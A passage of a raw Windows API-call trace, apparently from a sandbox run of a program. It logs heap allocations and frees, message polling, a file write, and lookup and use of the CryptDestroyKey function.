hHeap=0x970000) returned 1 [0135.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0135.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0135.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0135.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0135.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0135.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0135.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0135.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0135.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0135.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0135.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0135.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0135.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0135.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0135.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0135.133] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0135.134] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0135.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0135.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0135.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0135.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0135.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0135.134] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0135.134] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0135.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0135.134] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0135.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0135.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0135.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0135.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0135.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0135.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0135.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0135.134] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0135.151] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0135.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0135.151] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0135.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0135.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0135.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0135.151] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0135.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0135.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0135.151] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0135.151] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0135.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0135.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0135.153] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0135.153] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0135.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0135.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0135.153] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0135.153] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0135.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0135.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0135.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0135.153] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0135.153] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0135.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0135.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0135.153] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0135.153] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0135.153] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0135.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0135.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0135.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0135.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0135.264] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0135.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0135.265] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0135.265] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0135.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0135.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0135.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0135.266] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f39818*, nNumberOfBytesToWrite=0x13808, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f39818*, lpNumberOfBytesWritten=0x8cf5e4*=0x13808, lpOverlapped=0x0) returned 1 [0135.358] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0135.358] TranslateMessage (lpMsg=0x8cf708) returned 0 [0135.358] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0135.358] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0135.358] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0135.358] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0135.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0135.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0135.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0135.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0135.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0135.359] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0135.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0135.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0135.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0135.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0135.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0135.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0135.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0135.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0135.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0135.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0135.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0135.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0135.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0135.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0135.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0135.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0135.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0135.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0135.359] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0135.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0135.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0135.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0135.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d98 [0135.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0135.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0135.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0135.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0135.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0135.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0135.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0135.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0135.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0135.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0135.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0135.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0135.360] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0135.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0135.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0135.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0135.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0135.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0135.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0135.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0135.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0135.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0135.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0135.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0135.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0135.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0135.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0135.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0135.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0135.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0135.360] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0135.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0135.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0135.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0135.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0135.361] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0135.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0135.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0135.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0135.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0135.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0135.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0135.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0135.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0135.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0135.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0135.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0135.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0135.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0135.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0135.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0135.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0135.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0135.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0135.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0135.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0135.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0135.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0135.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0135.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0135.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0135.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0135.362] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0135.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0135.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0135.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0135.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0135.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0135.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0135.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0135.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0135.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0135.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0135.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0135.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0135.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0135.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0135.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0135.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0135.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0135.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0135.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0135.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0135.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0135.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0135.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e50950, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0135.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0135.363] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0135.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0135.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0135.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0135.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0135.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0135.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0135.363] CryptDestroyKey (hKey=0xa87610) returned 1 [0135.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0135.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0135.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0135.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0135.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0135.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0135.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0135.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0135.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0135.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0135.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0135.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0135.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0135.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0135.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0135.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0135.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0135.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0135.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0135.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0135.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0135.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0135.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0135.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0135.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0135.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0135.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0135.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0135.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: 